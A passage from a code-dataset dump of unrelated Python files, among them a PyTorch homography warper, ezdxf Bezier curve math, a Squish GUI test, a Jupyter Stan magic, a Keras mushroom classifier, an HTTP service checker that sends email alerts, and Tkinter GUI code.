\"\"\"Warps patches by homographies.\n\n .. math::\n\n X_{dst} = H_{dst}^{src} * X_{src}\n\n Args:\n width (int): The width of the image to warp.\n height (int): The height of the image to warp.\n points (Tensor): Tensor[3, N] of homogeneous points in normalized image\n space [-1, 1] to sample. Optional parameter.\n \"\"\"\n\n def __init__(self, height, width, points=None):\n super(HomographyWarper, self).__init__()\n if points is not None:\n assert points.size(0) == 3, \"Points must be 3xN\"\n self.width = points.size(1)\n self.height = 1\n self.grid = points\n else:\n self.width = width\n self.height = height\n # create base grid to use for computing the flow\n self.grid = create_meshgrid(\n height, width, normalized_coordinates=True)\n\n def warp_grid(self, H):\n \"\"\"\n :param H: Homography or homographies (stacked) to transform all points\n in the grid.\n :returns: Tensor[1, Height, Width, 2] containing transformed points in\n normalized images space.\n \"\"\"\n batch_size = H.shape[0] # expand grid to match the input batch size\n grid = self.grid.repeat(batch_size, 1, 1, 1) # NxHxWx2\n if len(H.shape) == 3: # local homography case\n H = H.view(batch_size, 1, 3, 3) # NxHxWx3x3\n # perform the actual grid transformation,\n # the grid is copied to input device and casted to the same type\n flow = transform_points(H, grid.to(H.device).type_as(H)) # NxHxWx2\n return flow.view(batch_size, self.height, self.width, 2) # NxHxWx2\n\n def random_warp(self, patch, dist):\n return self(patch, random_homography(dist))\n\n def crop_and_warp(self, H, image, roi, padding_mode='zeros'):\n grid = self.warp_grid(H)\n assert len(image.shape) == 4, image.shape\n\n width, height = image.shape[3], image.shape[2]\n\n start_x, end_x = roi[2], roi[3] - 1 # inclusive [x_0, x_1]\n start_y, end_y = roi[0], roi[1] - 1\n\n start_x = (2 * start_x) / width - 1\n end_x = (2 * end_x) / width - 1\n\n start_y = (2 * start_y) / height - 1\n end_y = (2 * end_y) / height - 1\n\n b_x = (start_x + end_x) / 2\n a_x = b_x - start_x\n\n b_y = (start_y + end_y) / 2\n a_y = b_y - start_y\n a = Variable(torch.FloatTensor((a_x, a_y)))\n b = Variable(torch.FloatTensor((b_x, b_y)))\n if grid.is_cuda:\n a = a.cuda()\n b = b.cuda()\n grid = grid * a + b\n return F.grid_sample(\n image, grid, mode='bilinear', padding_mode=padding_mode)\n\n def forward(self, patch, dst_homo_src, padding_mode='zeros'):\n \"\"\"Warps an image or tensor from source into reference frame.\n\n Args:\n patch (Tensor): The image or tensor to warp. Should be from source.\n dst_homo_src (Tensor): The homography or stack of homographies\n from source to destination.\n padding_mode (string): Either 'zeros' to replace out of bounds with\n zeros or 'border' to choose the closest\n border data.\n\n Return:\n Tensor: Patch sampled at locations from source to destination.\n\n Shape:\n - Input: :math:`(N, C, H, W)` and :math:`(N, 3, 3)`\n - Output: :math:`(N, C, H, W)`\n\n Example:\n >>> input = torch.rand(1, 3, 32, 32)\n >>> homography = torch.eye(3).view(1, 3, 3)\n >>> warper = tgm.HomographyWarper(32, 32)\n >>> output = warper(input, homography) # NxCxHxW\n \"\"\"\n if not dst_homo_src.device == patch.device:\n raise TypeError(\"Patch and homography must be on the same device. \\\n Got patch.device: {} dst_H_src.device: {}.\"\n .format(patch.device, dst_homo_src.device))\n return torch.nn.functional.grid_sample(\n patch, self.warp_grid(dst_homo_src), mode='bilinear',\n padding_mode=padding_mode)\n\n# functional api\n\n\ndef homography_warp(patch, dst_H_src, dsize, points=None,\n padding_mode='zeros'):\n \"\"\"\n .. note:: Functional API for :class:`torgeometry.HomographyWarper`\n\n Warps patches by homographies.\n\n Args:\n patch (Tensor): The image or tensor to warp. Should be from source.\n dst_homo_src (Tensor): The homography or stack of homographies from\n source to destination.\n dsize (tuple): The height and width of the image to warp.\n points (Tensor): Tensor[3, N] of homogeneous points in normalized image\n space [-1, 1] to sample. Optional parameter.\n padding_mode (string): Either 'zeros' to replace out of bounds with\n zeros or 'border' to choose the closest border\n data.\n\n Return:\n Tensor: Patch sampled at locations from source to destination.\n\n Shape:\n - Input: :math:`(N, C, H, W)` and :math:`(N, 3, 3)`\n - Output: :math:`(N, C, H, W)`\n\n Example:\n >>> input = torch.rand(1, 3, 32, 32)\n >>> homography = torch.eye(3).view(1, 3, 3)\n >>> output = tgm.homography_warp(input, homography, (32, 32)) # NxCxHxW\n \"\"\"\n height, width = dsize\n warper = HomographyWarper(height, width, points)\n return warper(patch, dst_H_src, padding_mode)\n","sub_path":"torchgeometry/homography_warper.py","file_name":"homography_warper.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611311106","text":"# Purpose: Bezier Curve optimized for 4 control points\n# Created: 26.03.2010\n# Copyright (c) 2010-2020 Manfred Moitzi\n# License: MIT License\nfrom typing import List, TYPE_CHECKING, Iterable, Union\nimport math\nfrom ezdxf.math import Vector, Vec2\n\nif TYPE_CHECKING:\n from ezdxf.eztypes import Vertex\n\n\ndef check_if_in_valid_range(t: float):\n if not (0 <= t <= 1.):\n raise ValueError(\"t not in range [0 to 1]\")\n\n\nclass Bezier4P:\n \"\"\"\n Implements an optimized cubic `Bézier curve`_ for exact 4 control points. A `Bézier curve`_ is a parametric\n curve, parameter `t` goes from ``0`` to ``1``, where ``0`` is the first control point and ``1`` is the\n fourth control point.\n\n Special behavior:\n\n - 2D control points in, returns 2D results as :class:`~ezdxf.math.Vec2` objects\n - 3D control points in, returns 3D results as :class:`~ezdxf.math.Vector` objects\n\n Args:\n defpoints: iterable of definition points as :class:`Vec2` or :class:`Vector` compatible objects.\n\n \"\"\"\n\n def __init__(self, defpoints: List['Vertex']):\n if len(defpoints) == 4:\n is3d = any(len(p) > 2 for p in defpoints)\n vector_class = Vector if is3d else Vec2\n self._control_points = vector_class.list(defpoints)\n else:\n raise ValueError(\"Four control points required.\")\n\n @property\n def control_points(self) -> List[Union[Vector, Vec2]]:\n \"\"\" control points as list of ``(x, y, z)``, z-axis is ``0`` for 2D curves. \"\"\"\n return self._control_points\n\n def tangent(self, t: float) -> Union[Vector, Vec2]:\n \"\"\"\n Returns direction vector of tangent for location `t` at the `Bézier curve`_.\n\n Args:\n t: curve position in the range ``[0, 1]``\n\n \"\"\"\n check_if_in_valid_range(t)\n return self._get_curve_tangent(t)\n\n def point(self, t: float) -> Union[Vector, Vec2]:\n \"\"\"\n Returns point for location `t`` at the `Bézier curve`_.\n\n Args:\n t: curve position in the range ``[0, 1]``\n\n \"\"\"\n check_if_in_valid_range(t)\n return self._get_curve_point(t)\n\n def approximate(self, segments: int) -> Iterable[Union[Vector, Vec2]]:\n \"\"\"\n Approximate `Bézier curve`_ by vertices, yields `segments` + 1 vertices as ``(x, y[, z])`` tuples.\n\n Args:\n segments: count of segments for approximation\n\n \"\"\"\n delta_t = 1. / segments\n yield self._control_points[0]\n for segment in range(1, segments):\n yield self.point(delta_t * segment)\n yield self._control_points[3]\n\n def _get_curve_point(self, t: float) -> Union[Vector, Vec2]:\n b1, b2, b3, b4 = self._control_points\n one_minus_t = 1. - t\n return b1 * (one_minus_t ** 3) + (b2 * (3. * one_minus_t ** 2 * t)) + (b3 * (3. * one_minus_t * t ** 2)) + (\n b4 * (t ** 3))\n\n def _get_curve_tangent(self, t: float) -> Union[Vector, Vec2]:\n b1, b2, b3, b4 = self._control_points\n return b1 * (-3. * (1. - t) ** 2) + (b2 * (3. * (1. - 4. * t + 3. * t ** 2))) + (\n b3 * (3. * t * (2. - 3. * t))) + (b4 * (3. * t ** 2))\n\n def approximated_length(self, segments: int = 100) -> float:\n \"\"\" Returns estimated length of `Bézier curve`_ as approximation by line `segments`. \"\"\"\n length = 0.\n prev_point = None\n for point in self.approximate(segments):\n if prev_point is not None:\n length += prev_point.distance(point)\n prev_point = point\n return length\n\n\ndef cubic_bezier_arc_parameters(start_angle: float, end_angle: float, segments: int = 1):\n \"\"\"\n Yields cubic Bezier curve parameters for a circular 2D arc with center at (0, 0) and a radius of 1\n in the form of [start point, 1. control point, 2. control point, end point].\n\n Args:\n start_angle: start angle in radians\n end_angle: end angle in radians (end_angle > start_angle!)\n segments: count of segments, at least one segment for each quarter (pi/2)\n\n \"\"\"\n # Source: https://stackoverflow.com/questions/1734745/how-to-create-circle-with-b%C3%A9zier-curves\n if segments < 1:\n raise ValueError('Invalid argument segments (>= 1).')\n delta_angle = end_angle - start_angle\n if delta_angle > 0:\n arc_count = max(math.ceil(delta_angle / math.pi * 2.0), segments)\n else:\n raise ValueError('Delta angle from start- to end angle has to be > 0.')\n\n segment_angle = delta_angle / arc_count\n tangent_length = 4.0 / 3.0 * math.tan(segment_angle / 4.0)\n\n angle = start_angle\n end_point = None\n for _ in range(arc_count):\n start_point = Vector.from_angle(angle) if end_point is None else end_point\n angle += segment_angle\n end_point = Vector.from_angle(angle)\n control_point_1 = start_point + (-start_point.y * tangent_length, start_point.x * tangent_length)\n control_point_2 = end_point + (end_point.y * tangent_length, -end_point.x * tangent_length)\n yield start_point, control_point_1, control_point_2, end_point\n","sub_path":"src/ezdxf/math/bezier4p.py","file_name":"bezier4p.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210946601","text":"source(findFile(\"scripts\", \"utilities.py\"))\n\ndef main():\n startOrAttachToDAWN()\n setupEPDPython()\n \n activateItem(waitForObjectItem(\":_Menu\", \"Window\"))\n activateItem(waitForObjectItem(\":Window_Menu\", \"Preferences\"))\n expand(waitForObjectItem(\":Preferences_Tree\", \"PyDev\"))\n mouseClick(waitForObjectItem(\":Preferences_Tree\", \"Interactive Console\"))\n connectDebug = waitForObject(\":Preferences.Connect console to Variables Debug View?_Button\")\n if not connectDebug.getSelection():\n clickButton(connectDebug)\n clickButton(waitForObject(\":Preferences.OK_Button\"))\n\n openPerspective(\"Debug\")\n openPyDevConsole()\n \n # XXX Dropping in Squish seems to require the horizontal scroll bar to be enabled, do this by printing a long line\n # Squish provided a patched version that resolves this issue, but it doen't appear to work on all platforms (e.g. win64)\n # It is expected a full fix will be available in Squish 4.3\n mouseClick(waitForObject(\":Clear Console_ToolItem\"))\n type(waitForObject(\":PyDev Console\"), \"print 'X' * 1000\")\n type(waitForObject(\":PyDev Console\"), \"\")\n snooze(5)\n type(waitForObject(\":PyDev Console\"), \"myvar='Kichwa Was Here'\")\n type(waitForObject(\":PyDev Console\"), \"\")\n mouseClick(waitForObjectItem(\":Variables_Tree\", \"myvar\"))\n dragAndDrop(waitForObjectItem(\":Variables_Tree\", \"myvar\"), 5, 5, \":PyDev Console\", 5, 5, DnD.DropCopy)\n mouseClick(waitForObject(\":PyDev Console\"))\n type(waitForObject(\":PyDev Console\"), \"\")\n type(waitForObject(\":PyDev Console\"), \"\")\n type(waitForObject(\":PyDev Console\"), \"print \")\n\n type(waitForObject(\":PyDev Console\"), \"\")\n # We need to wait a moment while the python executes the print above\n # We don't (yet?) have a good way to synchronize on this event \n # (Note, it may be best to waitFor() the text ending with '>>> ' which implies that\n # python is done and new commands can be entered)\n snooze(10)\n expected = \"\\nKichwa Was Here\\n>>> \"\n got = waitForObject(\":PyDev Console\", 15000).text\n if got.endswith(expected):\n test.verify(True, \"Variable dropped successfully and printed expected value\")\n else:\n \ttest.fail(\"Console had unexpected text, Expected endswith '%s', got '%s'\" % (expected, got))\n\n closeOrDetachFromDAWN()\n\n","sub_path":"org.dawnsci.squishtests/suite_epd_general/tst_console_drag_drop/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"361126232","text":"from tkinter import *\r\nimport sys\r\nRoot=Tk()\r\nRTitle=Root.title(\"Windows\")\r\nRWidth=Root.winfo_screenwidth()\r\nRHeight=Root.winfo_screenheight()\r\nRoot.geometry((\"%dx%d\")%(RWidth,RHeight))\r\nclass StatusBar(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master)\r\n self.label = Label(self, bd=1, relief=SUNKEN, anchor=W)\r\n self.label.pack(fill=X)\r\n def set(self, format, *args):\r\n self.label.config(text=format % args)\r\n self.label.update_idletasks()\r\n def clear(self):\r\n self.label.config(text=\"\")\r\n self.label.update_idletasks()\r\nstatus=StatusBar(Root)\r\nstatus.pack(side=BOTTOM, fill=X)\r\nRoot.mainloop()\r\n\r\n","sub_path":"Graphique Tkinter/pleinEcran.py","file_name":"pleinEcran.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"67517006","text":"import datetime\nimport humanize\nfrom typing import Tuple, Dict\n\nimport argparse\n\nfrom IPython.core.magic import Magics, cell_magic, magics_class\n\nfrom IPython.utils.capture import capture_output\n\nimport pystan\n\n\ndef parse_args(argstring: str) -> Tuple[str, Dict]:\n # users can separate arguments with commas and/or whitespace\n parser = argparse.ArgumentParser(description=\"Process pystan arguments.\")\n parser.add_argument(\"variable_name\", nargs=\"?\", default=\"_stan_model\")\n parser.add_argument(\"--model_name\")\n parser.add_argument(\"--include_paths\", nargs=\"*\")\n parser.add_argument(\"--boost_lib\")\n parser.add_argument(\"--eigen_lib\")\n parser.add_argument(\"--verbose\", \"-v\", action=\"store_true\")\n parser.add_argument(\"--obfuscate_model_name\", action=\"store_false\")\n kwargs = vars(parser.parse_args(argstring.split()))\n\n variable_name = kwargs.pop(\"variable_name\")\n\n if not variable_name.isidentifier():\n raise ValueError(\n f\"The variable name {variable_name} is \"\n f\"not a valid python variable name.\"\n )\n\n # set defaults:\n if kwargs[\"model_name\"] is None:\n kwargs[\"model_name\"] = variable_name\n\n return variable_name, kwargs\n\n\n@magics_class\nclass StanMagics(Magics):\n def __init__(self, shell):\n super(StanMagics, self).__init__(shell)\n\n @cell_magic\n def stan(self, line, cell):\n \"\"\"\n Allow jupyter notebook cells create a pystan.StanModel object from\n Stan code in a cell that begins with %%stan. The pystan.StanModel\n gets assigned to a variable in the notebook's namespace, either\n named _stan_model (the default), or a custom name (specified\n by writing %%stan ).\n \"\"\"\n\n variable_name, stan_opts = parse_args(line)\n\n print(\n f\"Creating pystan model & assigning it to variable \"\n f'name \"{variable_name}\".'\n )\n print(f\"Stan options:\\n\", stan_opts)\n\n start = datetime.datetime.now()\n try:\n with capture_output(display=False) as capture:\n _stan_model = pystan.StanModel(model_code=cell, **stan_opts)\n except Exception:\n print(f\"Error creating Stan model:\")\n print(capture)\n raise\n end = datetime.datetime.now()\n delta = humanize.naturaldelta(end - start)\n\n self.shell.user_ns[variable_name] = _stan_model\n print(\n f'StanModel now available as variable \"{variable_name}\"!\\n'\n f\"Compilation took {delta}.\"\n )\n\n\ndef load_ipython_extension(ipython):\n ipython.register_magics(StanMagics)\n\n\ndef unload_ipython_extension(ipython):\n # ipython.user_global_ns.pop('_stan_vars', None)\n pass\n","sub_path":"jupyterstan/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601847926","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('newmailing', '0011_onemessage_template_id'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='messageerror',\n name='date_create',\n field=models.DateTimeField(verbose_name='Дата появления', auto_now_add=True, null=True),\n ),\n ]\n","sub_path":"newmailing/migrations/0012_messageerror_date_create.py","file_name":"0012_messageerror_date_create.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125936365","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : Wed Dec 26 11:35:29 2018\n# @Author : JRP - Ruipeng Jia\n\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom config import opt\n\n\nclass PositionalEncoding(nn.Module):\n # This class is modified from https://github.com/JayParks/transformer/blob/master/transformer/modules.py.\n\n def __init__(self, args):\n # max_seq_len: The maximum sequence length, or the time-steps, the second dimension of input x with shape of [B, L, D]\n super(PositionalEncoding, self).__init__()\n self.args = args\n max_seq_len = self.args.max_source_length\n\n ## j//2 because we have sin and cos tow channels\n position_encoding = np.array([[pos / np.power(10000, 2.0 * (j // 2) / self.args.hidden_dim) for j in range(self.args.hidden_dim)] for pos in range(max_seq_len)])\n position_encoding[:, 0::2] = np.sin(position_encoding[:, 0::2])\n position_encoding[:, 1::2] = np.cos(position_encoding[:, 1::2])\n position_encoding = torch.Tensor(position_encoding).to(opt.device)\n\n pad_row = torch.zeros([1, self.args.hidden_dim]).to(opt.device)\n position_encoding = torch.cat((pad_row, position_encoding))\n\n ## additional PAD position index\n self.position_encoding = nn.Embedding(max_seq_len + 1, self.args.hidden_dim)\n self.position_encoding.weight = nn.Parameter(position_encoding, requires_grad=False)\n\n def forward(self, input_len):\n # input_len: A tensor with shape (B). Each element's value in ths tensor is the length of a sequence from a mini batch.\n max_len = torch.max(input_len)\n input_pos = torch.LongTensor([list(range(1, length + 1)) + [opt.pad_id] * int(max_len - length) for length in input_len]).to(opt.device) # start from 1 because 0 is for PAD\n return self.position_encoding(input_pos)\n","sub_path":"bin/template/src/jptproject/l5_2018_12_Pytorch_Summarization_with_Pointer-Generator_Networks/modules/positional_encoding.py","file_name":"positional_encoding.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335387863","text":"import sys\nfrom PIL import Image\nfrom keras.models import load_model\nimport numpy as np\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\n\ndef main():\n name = sys.argv[1]\n #print(name)\n image = Image.open(name)\n image = image.resize((64, 64))\n image.show()\n model = load_model(\"model.h5\")\n np_image = np.array(image)\n np_image = np_image / 255\n np_image = np_image[np.newaxis, :, :, :]\n result = model.predict(np_image)\n #print(result)\n if result[0][0] > result[0][1]:\n print(\"椎茸\")\n else:\n print(\"月夜茸\")\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572260209","text":"#coding:UTF-8\n__author__ = 'riros@ya.ru'\n\n'''\nМногопоточный тестировщик доступности сервиса api-xml\n\npip install requests\nor\neasy_install requests\n'''\nfrom requests import get\nimport smtplib\nimport logging\nimport socket\nimport time\nimport multiprocessing\nimport os\n\nclass config:\n sender = 'riros@ya.ru'\n smtpserver= \"smtp.ya.ru\"\n sender_pass = '#######'\n sender_user =\"riros\"\n logfile = \"servicechecker.log\"\n logformat = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n roots = [\"ivanvalenkov@gmail.com\"] #все системные сообщения\n\n works = [\n {\n \"type\":\"http\",\n \"receivers\" :[\"ivanvalenkov@gmail.com\"], # можно сделать подобие юнитеста и для каждого сервиса свои адресаты-разработчики\n \"name\":\"ya_ru\",\n \"server\":\"ya.ru\",\n \"url\":r'http://ya.ru',\n \"response_timeout\":45, #todo\n \"repeat_delay\":60,\n \"error_action\":\"logandwait\"\n },\n {\n \"type\":\"http\",\n \"receivers\" :[\"ivanvalenkov@gmail.com\"], # можно сделать подобие юнитеста и для каждого сервиса свои адресаты-разработчики\n \"name\":\"api-xml\",\n \"server\":\"dev.1linegroup.com\",\n \"url\":r'http://dev.1linegroup.com/api-xml?ping',\n \"response_timeout\":45, #todo\n \"repeat_delay\":60,\n \"error_action\":\"sendmail\"# при каждом чихе будет отсылать письмо\n },\n ]\n \ndef sendmail(work,logger,message):\n try:\n obj = smtplib.SMTP(config.smtpserver)\n obj.login(config.sender_user,config.sender_pass)\n for recv in work[\"receivers\"]:\n m = \"Subject: ServiceChecker\\r\\n\\r\\n on %s:%s \\n\\r %s\" %(socket.gethostname(),socket.gethostbyname_ex(socket.gethostname())[2],message)\n obj.sendmail(config.sender,[recv],m)\n logger.info(\"email to \" + recv+\" sending Message:\"+message)\n obj.close()\n except :\n logger.error(\"exception in send mail to \" + recv +\" Message:\"+message)\n return\n\ndef do(work,init = False):\n EmailSended = False\n try:\n logger = logging.getLogger(work[\"name\"])\n logger.setLevel(logging.DEBUG)\n if not init:\n #fh = logging.FileHandler(work[\"name\"]+\".log\")\n fh = logging.FileHandler(\"workers.log\")\n formatter = logging.Formatter(config.logformat)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n\n #logger.setLevel(logging.DEBUG)\n logger.info(\"start\")\n except:\n print (\"Exceptino in logging system. IO Error\")\n sendmail(work,logger,\"Exceptino in logging system. IO Error\")\n return True\n while True:\n if not os.path.exists(\"process\"):\n logger.info(\"stop\")\n return False # нормальное завершение\n\n if work[\"type\"]==\"http\":\n try:\n resp = get(work[\"url\"])\n if resp.status_code == 200:\n logger.debug(\"test OK - \"+\"time to response:\"+str(resp.elapsed))\n if EmailSended and work[\"error_action\"] == \"sendmail\":\n sendmail(work,logger,\"service '%s'\"%work[\"name\"]+\" restored\")\n EmailSended = False\n if init:\n return False\n else:\n logger.error(\"response code:\"+resp.status_code)\n if not EmailSended:\n if work[\"error_action\"] == \"sendmail\":\n sendmail(work,logger,\"response code:\"+resp.status_code)\n EmailSended = True\n if init:\n return True\n resp.close()\n except :\n print (\"Exception in do('%s')\"%work[\"name\"])\n logger.error(\"Exception in do('%s')\"%work[\"name\"])\n if not EmailSended:\n if work[\"error_action\"] == \"sendmail\":\n sendmail(work,logger,\"Exception in do('%s')\"%work[\"name\"])\n EmailSended = True\n if init:\n return True\n\n time.sleep(work[\"repeat_delay\"])\n #break\n\ndef init(rootlog):\n rootlog.info(\"init...\")\n #check smtp service\n rootlog.info(\"check smtp service\")\n try:\n obj = smtplib.SMTP(config.smtpserver)\n obj.login(config.sender_user,config.sender_pass)\n obj.close()\n rootlog.info(\"done\")\n except :\n rootlog.error(\"Except smtp service\")\n print (\"except smtp service\")\n raise\n\n for work in config.works:\n err = do(work,True)\n if err:\n rootlog.error(\"init fail in:\"+work[\"name\"])\n print (\"INIT FAIL!\")\n return False\n rootlog.info(\"init done.\")\n return True\n\ndef main():\n rootlog = logging.getLogger(\"\")\n rootlog.setLevel(logging.DEBUG)\n fh = logging.FileHandler(config.logfile)\n formatter = logging.Formatter(config.logformat)\n fh.setFormatter(formatter)\n rootlog.addHandler(fh)\n rootlog.info(\"================================================================================\")\n rootlog.info(\"start\")\n if init(rootlog):\n rootlog.info(\"sending emails to roots\")\n try:\n obj = smtplib.SMTP(config.smtpserver)\n errcode,smtp_server_message = obj.login(config.sender_user,config.sender_pass)\n for recv in config.roots:\n obj.sendmail(config.sender,[recv],\"Subject: ServiceChecker\\r\\n\\r\\n service started on server %s\"%socket.gethostbyname_ex(socket.gethostname())[2])\n obj.close()\n except:\n rootlog.error(\"sending email message:service started\")\n rootlog.info(\"done\")\n rootlog.info(\"spawn workers...\")\n\n if not os.path.exists(\"process\"):\n f = open(\"process\",'wb')\n f.write(bytes(\"1\",'utf-8'))\n f.close()\n\n print (\"works:\"+str(len(config.works)))\n # а вот тут магия! ;)\n p = multiprocessing.Pool(len(config.works))\n p.map(do,config.works)\n\n rootlog.info(\"stop\")\n rootlog.info(\"---------------------------------------------------------------------------------------------\")\n print (\"exit\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"servicechecker/servicechecker.py","file_name":"servicechecker.py","file_ext":"py","file_size_in_byte":6590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"301379871","text":"\"\"\"Preference model tests.\"\"\"\n\nimport os\nfrom unittest import TestCase\nfrom sqlalchemy import exc\n\nfrom models import db, User, Preference\n\nos.environ['DATABASE_URL'] = \"postgresql:///statshot_test\"\n\nfrom app import app\n\ndb.create_all()\n\nclass PrefsModelTestCase(TestCase):\n \"\"\"Tests for Preference model\"\"\"\n\n def setUp(self):\n \"\"\"Create test client, add sample data\"\"\"\n db.drop_all()\n db.create_all()\n\n u1 = User.register(\"test1\", \"passwordtest1\")\n uid1 = 1111\n u1.id = uid1\n\n db.session.commit()\n\n p1 = Preference(\n user_id = u1.id,\n fav_team_id = 25\n )\n\n db.session.commit()\n\n self.p1 = p1\n self.client = app.test_client()\n\n def tearDown(self):\n \"\"\"Tear down after each test\"\"\"\n res = super().tearDown()\n db.session.rollback()\n return res\n\n def test_prefs_models(self):\n \"\"\"Test basic preference functionality\"\"\"\n u = User.register(\"testprefs\", \"prefsword\")\n uid = 222\n u.id = uid\n db.session.add(u)\n db.session.commit()\n\n p = Preference(\n user_id = u.id,\n fav_team_id = 2\n )\n \n db.session.add(p)\n db.session.commit()\n\n ptest = Preference.query.get(p.user_id)\n\n self.assertEqual(ptest.fav_team_id, 2)\n\n def test_no_user_id(self):\n \"\"\"Test for None value user id in prefs\"\"\"\n\n u2 = User.register(\"testprefs\", \"prefsword\")\n uid2 = 222\n u2.id = uid2\n db.session.add(u2)\n db.session.commit()\n\n p2 = Preference(\n user_id = None,\n fav_team_id = 2\n )\n\n db.session.add(p2)\n with self.assertRaises(exc.IntegrityError) as context:\n db.session.commit()\n\n def test_invalid_user_id(self):\n \"\"\"Test for invalid user id in prefs\"\"\"\n\n u3 = User.register(\"testprefs\", \"prefsword\")\n uid3 = 333\n u3.id = uid3\n db.session.add(u3)\n db.session.commit()\n\n p3 = Preference(\n user_id = 99999,\n fav_team_id = 2\n )\n\n db.session.add(p3)\n with self.assertRaises(exc.IntegrityError) as context:\n db.session.commit()","sub_path":"test_prefs_model.py","file_name":"test_prefs_model.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313631806","text":"import cv2\nimport numpy as np\n\ndef Opening():\n originalImage = cv2.imread('C:\\\\Users\\\\ashis\\\\Pictures\\\\Camera Roll\\\\RP_back.PNG')\n img = cv2.cvtColor(originalImage, cv2.COLOR_BGR2GRAY)\n kernel = np.ones((5, 5), np.uint8)\n #erosion = cv2.erode(originalImage, kernel, iterations=1)\n closing = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n\n cv2.imshow('image', closing)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n #img = cv2.cvtColor(originalImage, cv2.COLOR_BGR2GRAY)\n\nOpening()","sub_path":"MorphologicalTransformation.py","file_name":"MorphologicalTransformation.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271854347","text":"import tkinter as tk\r\nfrom tkinter import *\r\nimport utils\r\n\r\n\r\n\r\n### Frames ###\r\nclass MainWindow(tk.Frame):\r\n ''' Main Window '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n\r\nclass OptionFrame(tk.Frame):\r\n ''' Use your options '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n\r\nclass EntryFrame(tk.Frame):\r\n ''' Use your options '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\n self.config(bg='#BCCE98')\r\n\r\n self.nameVar = StringVar()\r\n self.qtyVar = StringVar()\r\n self.catVar = StringVar()\r\n\r\n self.nameLabel = Label(self, text='Item name: ', bg='#BCCE98', font=\"helvetica 14\")\r\n self.nameEntry = Entry(self, textvariable=self.nameVar)\r\n self.qtyLabel = Label(self, text='Quantity: ', bg='#BCCE98', font=\"helvetica 14\")\r\n self.qtyEntry = Entry(self, textvariable=self.qtyVar)\r\n self.catLabel = Label(self, text='Category: ', bg='#BCCE98', font=\"helvetica 14\")\r\n self.catEntry = Entry(self, textvariable=self.catVar)\r\n\r\n cats = utils.loadCategories()\r\n\r\n if not cats:\r\n cats=tuple(' ')\r\n \r\n self.catMenu = OptionMenu(self, self.catVar, *cats)\r\n\r\n self.nameLabel.grid(row=0, column=0)\r\n self.nameEntry.grid(row=0, column=1)\r\n self.qtyLabel.grid(row=1, column=0)\r\n self.qtyEntry.grid(row=1, column=1)\r\n self.catLabel.grid(row=2, column=0)\r\n self.catEntry.grid(row=2, column=1)\r\n self.catMenu.grid(row=2, column=2, sticky=\"ew\")\r\n\r\n Grid.columnconfigure(self, 0, weight=1)\r\n Grid.columnconfigure(self, 1, weight=1)\r\n Grid.columnconfigure(self, 2, weight=1)\r\n \r\n\r\n \r\n\r\n \r\n\r\nclass SearchFrame(tk.Frame):\r\n ''' Search '''\r\n def __init__(self, parent, var=None):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.label = Label(self, text='Search here: ', bg='#BCCE98', font='helvetica 14').pack(side=LEFT)\r\n self.entry = Entry(self, textvariable=var, font='helvetica 14')\r\n self.entry.pack(fill='x')\r\n\r\nclass NavFrame(tk.Frame):\r\n ''' Navigation buttons '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n FONT = \"Helvetica 14 bold\"\r\n\r\n\r\n \r\n\r\n nxt = Button(self, text='>', command=parent.nextpage, height=2, width=20, font=FONT, bg='#f9f9f9')\r\n \r\n\r\n prv = Button(self, text='<', command=parent.prevpage, height=2, width=20, font=FONT, bg='#f9f9f9')\r\n \r\n \r\n fst = Button(self, text='<<', command=parent.firstpage, height=2, width=20, font=FONT, bg='#f9f9f9')\r\n \r\n \r\n lst = Button(self, text='>>', command=parent.lastpage, height=2, width=20, font=FONT, bg='#f9f9f9')\r\n\r\n\r\n rfr = Button(self, text='Refresh', command=parent.update, height=2, width=20, font=FONT, bg='#f9f9f9')\r\n\r\n\r\n\r\n\r\n fst.pack(side=LEFT)\r\n prv.pack(side=LEFT)\r\n lst.pack(side=RIGHT)\r\n 